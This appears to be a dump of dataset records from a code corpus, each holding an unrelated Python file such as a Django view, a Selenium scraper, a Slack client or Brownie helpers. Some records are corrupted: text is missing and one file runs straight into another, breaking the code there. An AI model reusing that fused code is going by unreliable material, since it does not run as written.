+{"seq_id":"638004305","text":"#-*- coding: utf-8 -*-\n\nfrom django.db.models import Sum\nfrom django.utils import simplejson\n\nfrom dajaxice.decorators import dajaxice_register\nfrom cartel.models import ContratoPropietario, ContratoCliente, Cobro, Pago\nfrom django.db.models.aggregates import Max\n\n\n@dajaxice_register\ndef get_contrato_file(request, contrato_id,tipo=\"cliente\"):\n if tipo=='cliente':\n documento=ContratoCliente.objects.get(id=contrato_id).documento\n else:\n documento=ContratoPropietario.objects.get(id=contrato_id).documento\n return simplejson.dumps({'documento':str(documento)})\n\n#obtiene el siguiente numero de pago o de cobro\n@dajaxice_register\ndef get_siguiente(request, contrato_id,tipo=\"cobro\"):\n if tipo=='cobro':\n nro=Cobro.objects.filter(id_contrato=contrato_id).aggregate(Max('numero'))['numero__max']\n else:\n nro=Pago.objects.filter(contrato_id=contrato_id).aggregate(Max('numero'))['numero__max']\n nro= int(nro)+1 if nro else 1\n return simplejson.dumps({'nro':str(nro)})\n\n","sub_path":"cartel/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"453918615","text":"'''\nAnalyze positive/negative samples of specific labels (w their FBB coefs)\n'''\n\nimport numpy as np\nfrom tagio.tag import *\nfrom tagio.DatasetHelper import SyntheticDatasetHelper as SDH\nimport tagio.xray_data_processor as Processor\nimport os\nimport matplotlib.pyplot as plt\nimport scipy.io\n\n\ndata_dir = '/home/zquan/xray_data/nodefect_50k/'\ncoef_dir = '/home/zquan/xray_data/fbb_output/nodefect_50k/'\noutput_dir = '/home/zquan/xray_data/fbb_analysis/'\nlabel_len = 10\n\n\ndef sample(label, n_positive, n_negative):\n idx_positive = np.where(label == 1)[0]\n idx_negative = np.where(label == 0)[0]\n if idx_positive.size > n_positive:\n idx_positive = np.random.permutation(idx_positive)[:n_positive]\n if idx_negative.size > n_negative:\n idx_negative = np.random.permutation(idx_negative)[:n_negative]\n return idx_positive, idx_negative\n\n\ndef visualize(sdh, files, output_template):\n for i, f in enumerate(files):\n print('%d / %d' % (i, len(files)))\n image = scipy.io.loadmat(f)['detector_image']\n image = np.log(1 + image) / np.log(65536)\n expr, name = sdh.split_expr_name(f)\n coef_path = os.path.join(coef_dir, expr, name + '.npy')\n coef = np.reshape(np.load(coef_path), [2, 40, 11])\n amp = np.sqrt(coef[0, :, :] ** 2 + coef[1, :, :] ** 2)\n\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(18, 8))\n im = axes[0].imshow(image)\n ima = axes[1].imshow(amp)\n axes[2].plot(np.sum(amp, axis=0))\n fig.colorbar(im, ax=[axes[0]])\n fig.colorbar(ima, ax=[axes[1]])\n fig.suptitle(f)\n fig.savefig(output_template.format(i))\n plt.close(fig)\n\n\nif __name__ == '__main__':\n sdh = SDH(data_dir)\n l = sdh.get_image_list()\n l = np.random.permutation(l)[:5000] # sample the entire dataset\n tags = [tagdata(sdh.get_tag_from_image(x), tag_type=tagtype.Synthetic)\n for x in l]\n keywords = ['symmetry halo', 'symmetry ring', 'lattice.symmetry']\n\n for w in keywords:\n output_dir_w = output_dir + w + '/'\n if not os.path.isdir(output_dir_w):\n os.mkdir(output_dir_w)\n for i, t in enumerate(tags):\n if any(x.find(w) > -1 for x in t.SimulatedFeatures):\n sdh.copy_to(l[i], output_dir_w)\n\n'''\nif __name__ == '__main__':\n sdh = SDH(data_dir)\n l = sdh.get_image_list()\n l = np.random.permutation(l)[:5000] # sample the entire dataset\n tags = [tagdata(sdh.get_tag_from_image(x), tag_type=tagtype.Synthetic)\n for x in l]\n labels = np.zeros([len(l), label_len], dtype=int)\n for i, t in enumerate(tags):\n labels[i, :] = Processor.SimulatedFeatureSelectorSymmetry(t)[0, :label_len]\n\n indices = [7, 8, 9]\n for idx in indices:\n idx_positive, idx_negative = sample(labels[:, idx], 50, 50)\n if not os.path.isdir(output_dir + str(idx)):\n os.mkdir(output_dir + str(idx))\n visualize(sdh, l[idx_positive], output_dir + str(idx) + '/p-{}.png')\n visualize(sdh, l[idx_negative], output_dir + str(idx) + '/n-{}.png')\n'''\n","sub_path":"dtyu/xray_learning/analyze_fbb.py","file_name":"analyze_fbb.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"218181190","text":"\n'''\n从网页获取名字的操作。\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nimport time,requests\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(2)\ndriver.maximize_window()\ndriver.get(\"http://www.qqxiuzi.cn/zh/xingming\")\ndriver.find_element(By.XPATH,\"/html/body/div[3]/p[1]/input\").click()\ntime.sleep(3)\n\n# 得到网页内容,并通过BeautSoup处理元素,将提取的文本转换成str类型\nresponse = driver.page_source\nsoup = BeautifulSoup(response,'html.parser') # 用HTML解析网页\ntag = soup.find_all('div',attrs={'id':'show'})\nstr_txt = str(tag[0].text)\n\n\n# 定义数组存放名字\nname,i = [],0\n\n# print(len(str_txt))\n# name.append(str_txt[0:3])\nwhile(i\n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n deviceURL = '%s/serialnumber/%s' % (apiEndpoint, import_values['serial_number'])\n # This is where the request is sent\n request = requests.put(deviceURL, data=xmlData, headers=requestHeaders, verify=verifySSL, auth=(jssAPIUsername, jssAPIPassword))\n\n if request.status_code == 201:\n successMsg = 'Cleared device %s' % (import_values['serial_number'])\n print(successMsg)\n elif request.status_code == 404:\n raise Exception(\n 'Device %s was not found in the JSS' % (import_values['serial_number'])\n )\n else:\n raise Exception(\n request.text\n )\n\n except Exception as e:\n error_reached = True\n print(e)\n\nif error_reached:\n print('Error clearing User and Location for devices')\nelse:\n print('Finished clearing User and Location for devices')\n","sub_path":"Python/computerdevices/clear_user_and_location.py","file_name":"clear_user_and_location.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"153409432","text":"from dbconnector import db_select, db_insert, db_selectAnalyser\nimport eut_pcietable\n\n\nclass eut_config:\n def __init__(self, _id):\n \"\"\"\n eut configuratoin object\n\n\n \"\"\"\n\n self.__dbSELECT = db_select.dbselect()\n self.__dbSELECTAnalyser = db_selectAnalyser.dbselect()\n self.__dbINSERT = db_insert.dbinsert()\n\n self._id = _id\n self._name = str(\"\")\n self._info = str(\"\")\n self._chassisID = int(0)\n self._chassisText = str(\"\")\n self._moboID = int(0)\n self._moboText = str(\"\")\n self._hddAnz = int(0)\n self._hddID = int(0)\n self._hddText = str(\"\")\n self._cpuAnz = int(0)\n self._cpuID = int(0)\n self._cpuText = str(\"\")\n self._memAnz = int(0)\n self._memID = int(0)\n self._memText = str(\"\")\n self._psuAnz = int(0)\n self._psuID = int(0)\n self._psuText = str(\"\")\n self._pcieTableID = int(1)\n\n # laden das datenstazes zu einer eindeutigen id\n # aus der datenbank\n self.__load_eutConfig_byID(self._id)\n # jetzt wird noch der ensprechende text zu den komponenten ids geladen\n # z.B.: cpu_id(1) -> E3-1280v3\n # nach dieser funktion sollte in allen text variablen der passende\n # text zu der ID stehen\n self.__load_eutConfigNames()\n\n # pcie tabel objekt erstellen anhand der pcieTable ID\n self._pcieTable = eut_pcietable.eut_pcietable(self._pcieTableID)\n\n def __load_eutConfig_byID(self, idd):\n\n eutList_rear = self.__dbSELECT.get_configuration_byID(idd)\n eutList = eutList_rear[0]\n\n print(\"DEBUG: load configuration list {} - len(){} \".format(\n eutList, len(eutList)))\n\n self._name = str(eutList[1])\n self._info = str(eutList[2])\n self._chassisID = int(eutList[3])\n self._moboID = int(eutList[4])\n self._hddAnz = int(eutList[5])\n self._hddID = int(eutList[6])\n self._cpuAnz = int(eutList[7])\n self._cpuID = int(eutList[8])\n self._memAnz = int(eutList[9])\n self._memID = int(eutList[10])\n self._psuAnz = int(eutList[11])\n self._psuID = int(eutList[12])\n self._pcieTableID = int(eutList[13])\n\n def __load_eutConfigNames(self):\n\n # laden des datensatzes anhand der id\n rear = self.__dbSELECT.get_chassis_byID(self._chassisID)\n # die da nur ein element in der liste ist das erste element laden\n rear2 = rear[0]\n # tuple aufbau (id, name , info, ...)\n # deswegen das [1] element laden -- das ist der name z.B.: X540-T2\n # jetzt noch abspeichern\n self._chassisText = rear2[1]\n # diese 3 schritte werden jetzt mit jeder controller id gemacht\n\n rear = self.__dbSELECT.get_MoBo_byID(self._moboID)\n rear2 = rear[0]\n self._moboText = rear2[1]\n\n rear = self.__dbSELECT.get_HDD_byID(self._hddID)\n rear2 = rear[0]\n self._hddText = rear2[1]\n\n rear = self.__dbSELECT.get_cpu_byID(self._cpuID)\n rear2 = rear[0]\n self._cpuText = rear2[1]\n\n rear = self.__dbSELECT.get_mem_byID(self._memID)\n rear2 = rear[0]\n self._memText = rear2[1]\n\n rear = self.__dbSELECT.get_psu_byID(self._psuID)\n rear2 = rear[0]\n self._psuText = rear2[1]\n\n def print_info_eutConfig(self):\n\n a = \"+-{:60}-+\"\n b = \"| {:15}{:35}{:10} |\"\n c = \"| {:12} | {:3} |{:3} | {:34} |\"\n\n print(a.format(\"-\"*60))\n print(b.format(\"config id:\", str(self._id), \"\"))\n print(b.format(\"config name:\", self._name, \"\"))\n print(b.format(\"config info:\", self._info, \"\"))\n print(a.format(\"-\"*60))\n print(c.format(\"-\", \"cnt\", \" id\", \"ctrl name\"))\n print(a.format(\"-\"*60))\n print(c.format(\"Chassis: \", \" -\", self._chassisID, self._chassisText))\n print(c.format(\"MoBo: \", \" -\", self._moboID, self._moboText))\n print(c.format(\"HDD: \", self._hddAnz, self._hddID, self._hddText))\n print(c.format(\"CPU: \", self._cpuAnz, self._cpuID, self._cpuText))\n print(c.format(\"Memory: \", self._memAnz, self._memID, self._memText))\n print(c.format(\"PSU: \", self._psuAnz, self._psuID, self._psuText))\n print(a.format(\"-\"*60))\n print()\n\n\nif __name__ == '__main__':\n\n a = eut_config(1)\n","sub_path":"taff_v1/eut_config.py","file_name":"eut_config.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"27511487","text":"# -*- encoding: utf-8 -*-\n\nfrom netCDF4 import Dataset\nimport numpy as np\nimport json\n\n\nds_by_date = Dataset('./spGIS_diario.nc4', 'r+', format=\"NETCDF4\")\n\nmaxlat = -19.74827\nminlat = -25.4562\n\nmaxlon = -44.16656\nminlon = -53.42064\n\nycellsize = (maxlat - minlat) / len(ds_by_date['latitude'])\nxcellsize = (maxlon - minlon) / len(ds_by_date['longitude'])\n\nlocale_list = json.load(open('./locales.json'))\noutput = {}\n\nfor locale in locale_list:\n y = locale['latitude']\n x = locale['longitude']\n\n py = abs(int((y - minlat) / ycellsize))\n px = abs(int((x - minlon) / xcellsize))\n\n lat_index = ds_by_date['latitude'][py]\n long_index = [ds_by_date['longitude'][px]]\n\n output[locale['id']] = {}\n for date_index, date in enumerate(ds_by_date['time']):\n output[locale['id']][date] = {\n \"type\": \"Point\",\n \"coordinates\": [y, x],\n \"properties\": {\n \"precipitacao\": float(ds_by_date['precipitacao'][:][date_index][py][px]),\n \"tmin\": float(ds_by_date[\"tmin\"][:][date_index][py][px]),\n \"tmax\": float(ds_by_date[\"tmax\"][:][date_index][py][px]),\n \"rhmax\": float(ds_by_date[\"rhmax\"][:][date_index][py][px]),\n \"rhmin\": str(ds_by_date[\"rhmin\"][:][date_index][py][px])\n }\n }\n\njson.dump(output, \"spGIS_diario.json\")\n\nprint(\"hgeuueh\")\n","sub_path":"base/extract_points.py","file_name":"extract_points.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247959513","text":"\nfrom Packet import Packet\nfrom Connection import Connection\nfrom Interfaces import *\nimport Node\n\nclass Network:\n def __init__(self):\n # indexed by node_id\n self.nodes = {}\n\n #indexed by host IP address\n self.hosts = {}\n\n #indexed by a unique tuple of node_ids. See get_node_pair_id\n self.connections = {}\n\n #indexed by packet_id\n self.packets = {}\n\n def add_node(self, node):\n \"\"\"\n add a node to the network\n \"\"\"\n self.nodes[node.node_id] = node\n\n if isinstance(node, Node.Node.Host):\n self.hosts[node.get_IP_address()] = node\n\n def get_node_pair_id(self, n1_id, n2_id):\n return (n1_id, n2_id) if n1_id <= n2_id else (n2_id, n1_id)\n\n # def create_messageUDP(self, startIP, endIP, messageString):\n # startID = self.hosts[startIP].node_id\n # endID = self.hosts[startIP].node_id\n # # TODO The IDS are not important for message creation. Should use port numbers. Fix this.\n # segment = UDPSegment(UDPHeader(startID, endID, 0), messageString)\n # self.create_message(startID, endID, segment)\n #\n # def create_messageTCP(self, startIP, endIP, messageString):\n # startID = self.hosts[startIP].node_id\n # endID = self.hosts[startIP].node_id\n # # TODO The IDS are not important for message creation. Should use port numbers. Fix this.\n # segment = TCPSegment(TCPHeader(startID, endID), messageString)\n # self.create_message(startID, endID, segment)\n #\n # def create_message(self, startIP, endIP, UDP_TCP_segment):\n # startID = self.hosts[startIP].node_id\n # # TODO The IDS are not important for message creation. Should use port numbers. Fix this.\n # ip_datagram = IPDatagram(IPHeader(startIP,endIP), UDP_TCP_segment)\n # eth_frame = EthernetFrame(EthernetHeader(startIP, endIP), ip_datagram)\n # self.add_packet(Packet(self.nodes[startID], eth_frame))\n\n \n def add_connection(self, n1_id, n2_id, connection):\n \"\"\"\n add a connection between two nodes (by id)\n \"\"\"\n pair_id = self.get_node_pair_id(n1_id, n2_id)\n self.connections[pair_id] = connection\n\n def get_connection(self, n1_id, n2_id):\n return self.connections[self.get_node_pair_id(n1_id,n2_id)]\n\n def add_packet(self, packet):\n self.packets[packet.packet_id] = packet\n\n def remove_node(self, node_id):\n \"\"\"\n remove a node by id\n \"\"\"\n\n try:\n node = self.nodes[node_id]\n del self.nodes[node_id]\n for c_id in self.connections.keys():\n if node_id in c_id:\n del self.connections[c_id]\n for p_id, packet in self.packets.iteritems():\n if node_id == packet.current_node.node_id:\n del self.packets[p_id]\n\n if isinstance(node, Host):\n del self.hosts[node.interfaces[0].IP_address]\n\n return True\n except:\n return False\n\n\n\n def remove_connection(self, n1_id, n2_id):\n \"\"\"\n remove a connection by ids of nodes\n \"\"\"\n try:\n del self.connections[self.get_node_pair_id(n1_id, n2_id)]\n return True\n except:\n return False\n\n def get_connected_nodes(self, node_id):\n \"\"\"\n returns a list of nodes connected to the given node in the form\n [{\"node\": the node at the other end, \"connection\": the connection object}]\n \"\"\"\n connected = []\n for c_id, connection in self.connections.iteritems():\n if node_id in c_id:\n other_node = c_id[0] if c_id[1] == node_id else c_id[1]\n connected.append({\"node\":other_node, \"connection\":connection})\n return connected\n\n def get_as_graph(self):\n graph = {}\n for node in self.nodes:\n graph_node = {}\n for connection in self.get_connected_nodes(node):\n graph_node[connection[\"node\"]] = connection[\"connection\"].get_latency()\n graph[node] = graph_node\n return graph\n\n def get_better_graph(self):\n # Need to include the actual node and connection objects.\n # This will allow me to replace node_id's by interface IP addresses in the table\n #quite easily.\n\n graph = {}\n for node in self.nodes.values():\n graph_node = {}\n for connected in self.get_connected_nodes(node.node_id):\n graph_node[self.nodes[connected[\"node\"]]] = connected[\"connection\"]\n graph[node] = graph_node\n\n # Also, Switches need to be removed for this to work properly.\n\n done_list = []\n graph_copy = graph.copy()\n for node in graph_copy:\n done_list = []\n if not isinstance(node, Node.Node.Router):\n for adj_node_1, adj_conn_1 in graph_copy[node].iteritems():\n adj_ints = adj_conn_1.interfaces\n far_int_1 = adj_ints[0] if adj_ints[1] in node.interfaces.values() else adj_ints[1]\n for adj_node_2, adj_conn_2 in graph_copy[node].iteritems():\n if adj_node_2 != adj_node_1 and adj_node_2 not in done_list:\n oth_adj_ints = adj_conn_2.interfaces\n far_int_2 = oth_adj_ints[0] if oth_adj_ints[1] in node.interfaces.values() else oth_adj_ints[1]\n\n new_conn = Connection(None, adj_conn_1.get_latency() + adj_conn_2.get_latency())\n new_conn.fake_connect_interfaces(far_int_1, far_int_2)\n\n graph[adj_node_1][adj_node_2] = new_conn\n graph[adj_node_2][adj_node_1] = new_conn\n\n dict = graph[adj_node_1]\n del dict[node]\n done_list.append(adj_node_1)\n del graph[node]\n return graph\n\ndef network_init():\n\n global network\n network = Network()\n Node.static_id=0\n Connection.static_id=0\n Packet.static_packet_id = 0\n LLInterface.static_MAC = 1\n NLInterface.static_IP = 1\n","sub_path":"src/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"34237438","text":"import sys\nimport random\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QApplication, QLabel, QPushButton\nfrom PyQt5.QtGui import QPainter, QColor\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n self.qp = QPainter()\n self.status = 0\n self.setMouseTracking(True)\n self.btn = QPushButton('hehe', self)\n self.btn.clicked.connect(self.hehe)\n\n def hehe(self):\n self.status = 1\n self.update()\n\n def paintEvent(self, event):\n self.qp = QPainter()\n self.qp.begin(self)\n self.draw()\n self.qp.end()\n\n def draw(self):\n self.qp.setBrush(QColor(random.randint(0, 255),\n random.randint(0, 255), random.randint(0, 255)))\n if self.status == 1:\n self.qp.drawEllipse(random.randint(10, 200), random.randint(\n 10, 200), random.randint(10, 200), random.randint(10, 200))\n self.status = 0\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 300)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n ex.show()\n sys.exit(app.exec())","sub_path":"my first repo/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"572194390","text":"from typing import List, Callable, Union\nfrom fuze.interfaces import IRecordSet, ISerializer\nfrom fuze.util import typetools\n\n\nclass RecordSet(IRecordSet):\n def __init__(self, source: Union[List, Callable], encoder: Union[ISerializer, Callable]=None):\n self._records = source if isinstance(source, list) else []\n self._columns = []\n self._adapters = {}\n self._encoder = encoder\n if self._records:\n self._inspect()\n\n def _inspect(self):\n if self._columns:\n return\n\n if self._records:\n r = self._records[0]\n if hasattr(r, \"__dict__\"):\n columns = None\n\n if hasattr(r.__class__, \"columns\"):\n columns = r.__class__.columns\n elif hasattr(r.__class__, \"meta\"):\n columns = r.__class__.meta.columns\n\n if columns:\n for x, c in enumerate(columns):\n formatter = c.formatter\n if formatter:\n self._adapters[c.name] = formatter.format\n columns[x] = c.name\n else:\n columns = [k for k in r.__dict__.keys()]\n\n elif isinstance(r, dict):\n self._columns = [k for k in r.keys()]\n else:\n raise Exception(\"Unable to determine the column names for the input records.\")\n\n def encode(self, encoder: Union[ISerializer, Callable]=None):\n if encoder:\n self._encoder = encoder\n\n if not self._encoder:\n raise Exception(\"The recordset encoder has not been specified!\")\n\n encoder = self._encoder\n if typetools.istype(encoder, \"ISerializer\"):\n if not isinstance(encoder, ISerializer):\n encoder = encoder()\n\n if isinstance(encoder, ISerializer):\n return encoder.encode(self)\n return encoder(self._records)\n\n @property\n def records(self):\n return self._records\n\n @property\n def columns(self):\n return self._columns\n\n @property\n def adapters(self):\n return self._adapters\n\n @property\n def type(self):\n if not hasattr(self, \"_rt\"):\n if self._records:\n try:\n rt = self._records[0].__class__.__name__\n setattr(self, \"_rt\", rt)\n except:\n pass\n return getattr(self, \"_rt\", None)\n\n def __iter__(self):\n for r in self._records:\n yield r\n\n def __len__(self):\n return len(self._records)\n\n def __str__(self):\n rt = self.type\n if rt:\n return \"Recordset[{}] - {} records\".format(rt, len(self._records))\n return \"Recordset - {} records\".format(len(self._records))\n\n def __repr__(self):\n return self.__str__()","sub_path":"fuze/containers/recordset.py","file_name":"recordset.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"424300579","text":"import spacy\nfrom spacy.matcher import Matcher\n\nnlp = spacy.load(\"es_core_news_sm\")\nmatcher = Matcher(nlp.vocab)\n\ndoc = nlp(\n \"descargué Fortnite en mi computadora, pero no puedo abrir el juego. \"\n \"Ayuda? Cuando estaba descargando Minecraft, conseguí la versión de Windows \"\n \"donde tiene una carpeta '.zip' y usé el programa por defecto para \"\n \"descomprimirlo…así que también tengo que descargar Winzip?\"\n)\n\n# Escribe un patrón que encuentre una forma de \"descargar\" más un nombre propio\npattern = [{\"LEMMA\": ____}, {\"POS\": ____}]\n\n# Añade el patrón al matcher y usa el matcher sobre el documento\nmatcher.add(\"DOWNLOAD_THINGS_PATTERN\", None, pattern)\nmatches = matcher(doc)\nprint(\"Total de resultados encontrados:\", len(matches))\n\n# Itera sobre los resultados e imprime el texto del span\nfor match_id, start, end in matches:\n print(\"Resultado encontrado:\", doc[start:end].text)\n","sub_path":"exercises/es/exc_01_12_02.py","file_name":"exc_01_12_02.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"333551542","text":"from threading import Thread\r\nfrom time import sleep\r\nimport datetime\r\nimport time\r\nimport sys\r\nimport create\r\nimport delete\r\nimport edit\r\nimport display\r\nfrom tkinter import messagebox\r\nimport mysql.connector\r\nconn = mysql.connector.connect(user=\"root\",password=\"\",host = \"localhost\", database=\"reminderDB\")\r\nmycursor = conn.cursor()\r\n\r\n\r\ndef menu():\r\n while (1):\r\n print(\"Menu\")\r\n print(\"1. View \\n2. Create\\n3. Update\\n4. Delete\")\r\n option = input(\"Enter option : \")\r\n\r\n if option == \"1\":\r\n display.display()\r\n elif option == \"2\":\r\n create.create()\r\n elif option == \"3\":\r\n edit.edit()\r\n elif option == \"4\":\r\n delete.delete()\r\n else:\r\n print(\"Enter a valid option\")\r\n\r\ndef timer():\r\n while (1):\r\n #print(\"working\")\r\n mycursor.execute(\"SELECT MIN(DateTime) FROM reminder\")\r\n min = mycursor.fetchone()\r\n min_list = list(min)\r\n min_res_min = min_list[0].strftime(\"%Y-%m-%d %H:%M\")\r\n timeNow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\") #seconds\r\n\r\n while(min_res_min2}-{2:0>2}'.format(\n row['CaseDate'].year, row['CaseDate'].month, row['CaseDate'].day\n ),\n string_utils.xstr(row['PatientKey']),\n string_utils.xstr(row['Name']),\n string_utils.xstr(row['DiseaseCode1']),\n string_utils.xstr(row['DiseaseName1']),\n string_utils.xstr(row['Card']),\n string_utils.xstr(row['Continuance']),\n string_utils.xstr(row['Treatment']),\n ','.join(treats),\n treat_signature,\n string_utils.xstr(row['Doctor']),\n ', '.join(error_messages),\n ]\n for column_no in range(len(medical_record)):\n self.ui.tableWidget_prescript.setItem(\n row_no, column_no,\n QtWidgets.QTableWidgetItem(medical_record[column_no])\n )\n if column_no in [2]:\n self.ui.tableWidget_prescript.item(\n row_no, column_no).setTextAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter\n )\n elif column_no in [7]:\n self.ui.tableWidget_prescript.item(\n row_no, column_no).setTextAlignment(\n QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter\n )\n if len(error_messages) > 0:\n color = QtGui.QColor('red')\n self.ui.tableWidget_prescript.item(row_no, column_no).setForeground(color)\n\n def _get_ins_treat(self, case_key):\n treat_list = []\n\n sql = '''\n SELECT * FROM prescript WHERE\n CaseKey = {0} AND\n MedicineSet = 1 AND\n MedicineType IN (\"穴道\", \"處置\")\n ORDER BY MedicineName\n '''.format(case_key)\n rows = self.database.select_record(sql)\n\n for row in rows:\n if row['MedicineName'] is None:\n continue\n\n treat_list.append(row['MedicineName'])\n\n return treat_list\n","sub_path":"check_ins_treat.py","file_name":"check_ins_treat.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"147846255","text":"import cbio\nimport os\n\n\ndef bam_qc(input_files, output_file, config):\n \"\"\"\n Map fastq sequences against reference genome.\n \"\"\"\n\n bam_path = input_files[0]\n roi_path = input_files[1]\n\n REFERENCE_GENOME = config['ref'][config['conf']['build']]\n\n # bedtools qc software to generate information file\n picard_qc_cmd = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' CollectAlignmentSummaryMetrics ' +\\\n ' R=' + REFERENCE_GENOME +\\\n ' I=' + bam_path +\\\n ' O=' + output_file\n\n # Run command\n cbio.utils.run_cmd(picard_qc_cmd, 1)\n\n # BWA mapping software to generate sam file\n picard_qc_cmd_list = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' BedToIntervalList ' +\\\n ' I=' + roi_path +\\\n ' O=' + roi_path.replace('.bed', '.list') +\\\n ' SD=' + REFERENCE_GENOME.replace('.fa', '.dict')\n\n # Run command\n print(picard_qc_cmd_list)\n cbio.utils.run_cmd(picard_qc_cmd_list, 1)\n\n # BWA mapping software to generate sam file\n picard_qc_cmd_2 = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' CollectTargetedPcrMetrics ' +\\\n ' I=' + bam_path +\\\n ' O=' + output_file.strip('.txt') + '_2.txt' +\\\n ' TI=' + roi_path.replace('.bed', '.list') +\\\n ' AI=' + roi_path.replace('.bed', '.list')\n\n print(picard_qc_cmd_2)\n # Run command\n cbio.utils.run_cmd(picard_qc_cmd_2, 1)\n","sub_path":"mods/workflow/processes/bamqc.py","file_name":"bamqc.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"401402666","text":"import slack\nimport os\n\n\n# Load env variables and initialize slack python client\ndef initialize_slack_client():\n global slack_reporter_token, slack_channel_ID, slack_client\n slack_reporter_token = os.environ[\"SLACK_API_TOKEN\"]\n slack_channel_ID = os.environ[\"SLACK_CHANNEL\"]\n slack_client = slack.WebClient(token=slack_reporter_token)\n\n\n# Post messages and failures in slack\ndef post_message_in_slack(slack_message):\n slack_client.chat_postMessage(\n channel=slack_channel_ID,\n link_names=True,\n text=slack_message\n )\n\n\n# Get members of a channel\ndef get_channel_members():\n return slack_client.conversations_members(\n channel=slack_channel_ID\n )\n","sub_path":"cerberus/slack/slack_client.py","file_name":"slack_client.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"391325160","text":"from brownie import (\n network,\n accounts,\n config,\n MockV3Aggregator,\n Contract,\n VRFCoordinatorMock,\n LinkToken,\n interface,\n)\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\"]\n\n\ndef getAccount(index=None, id=None):\n # accounts[0]\n # accounts.add(\"env\")\n # accounts.load(\"id\")\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS\n or network.show_active() in FORKED_LOCAL_ENVIRONMENTS\n ):\n return accounts[0]\n else:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n if len(contract_type) <= 0:\n # MockV3Aggregator\n deploy_mocks()\n contract = contract_type[-1]\n # MockV3Aggregator[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n # address\n # ABI\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n # MockV3Aggregator.abi\n return contract\n\n\nDECIMALS = 8\nINITIAL_VALUE = 200000000000\n\n\ndef deploy_mocks():\n account = getAccount()\n mock_price_feed = MockV3Aggregator.deploy(\n DECIMALS, INITIAL_VALUE, {\"from\": account}\n )\n link_token = LinkToken.deploy({\"from\": account})\n VRFCoordinatorMock.deploy(link_token.address, {\"from\": account})\n print(\"Deployed!\")\n\n\ndef fund_with_link(\n _contract_address, _account=None, _link_token=None, _amount=100000000000000000\n):\n # 0.1 LINK\n account = _account if _account else getAccount()\n link_token = _link_token if _link_token else get_contract(\"link_token\")\n tx = link_token.transfer(_contract_address, _amount, {\"from\": account})\n # link_token_contract = interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(_contract_address, _amount, {\"from\": account})\n tx.wait(1)\n print(\"Fund contract!\")\n return tx\n","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"621897045","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\n\nfig = plt.figure()\nax = Axes3D(fig)\n\np = np.linspace(0, 2*math.pi, num=10)\nq = np.linspace(0, 2*math.pi, num=10)\nx = np.cos(p)*np.cos(q)\ny = np.sin(p)*np.cos(q)\nx, y = np.meshgrid(x, y)\nz = np.sin(q)\n\nax.plot_surface(x, y, z, rstride=1, cstride=1, 